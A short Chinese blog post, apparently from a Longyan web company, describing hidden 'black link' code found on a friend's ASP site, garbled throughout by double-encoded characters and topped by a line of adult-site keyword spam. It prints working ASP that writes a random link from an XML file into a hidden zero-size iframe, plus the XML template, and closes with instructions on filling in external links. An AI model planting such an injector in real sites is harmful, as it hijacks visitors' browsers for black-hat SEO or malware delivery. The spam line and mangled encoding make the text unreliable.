欧美精品亚洲精品日韩经典,午夜秒播,国产福利精品一区二区,亚洲国产成人精品久久,亚洲免费专区,国产精品国产三级国产a,日韩福利网站

龍巖易富通網(wǎng)絡(luò )科技有限公司

龍巖小程序開(kāi)發(fā),龍巖分銷(xiāo)系統

asp網(wǎng)站掛黑鏈

2015.09.10 | 684閱讀 | 0條評論 | 未命名

今天龍巖seo的一個(gè)朋友說(shuō)他網(wǎng)站是不是中毒了,既然會(huì )彈出淘寶的網(wǎng)站,我試著(zhù)訪(fǎng)問(wèn)下他的網(wǎng)站,除了彈出淘寶網(wǎng)站以外,殺毒軟件會(huì )彈出警告信息。 我看了代碼,有一段代碼好可疑,隱藏深。 ASP文件: [php] <% Option Explicit Response.Buffer = True Dim xml dim conu,dd dd=0 Randomize Set xml = Server.CreateObject("Microsoft.XMLDOM") xml.async = False xml.load (Server.MapPath("test.xml")) Dim title, heading, paragraph, testHTML title = xml.documentElement.childNodes(Int((100 * Rnd) + 1) ).text Set xml = Nothing response.write "document.write(""<iframe src='"&title&"' width='0' height='0'></iframe>"");" 'response.write "window.open ('"&title&"', 'newwindow', 'height=300, width=400, top=250, left=300,toolbar=no, menubar=no, scrollbars=no, resizable=no,location=n o, status=no');" %> [/php] 大概意思是隨處產(chǎn)生test.xml文件下的鏈接。 test.xml文件: [php]</pre> <?xml version="1.0" encoding="gb2312"?> <bookstore> <link>鏈接地址</link> <link>鏈接地址</link> <link>鏈接地址</link> <link>鏈接地址</link> <link>鏈接地址</link> </bookstore> [/php] 其中鏈接地址就是外鏈的地址要多少個(gè)地址直接寫(xiě)多少個(gè)。

贊 (

發(fā)表評論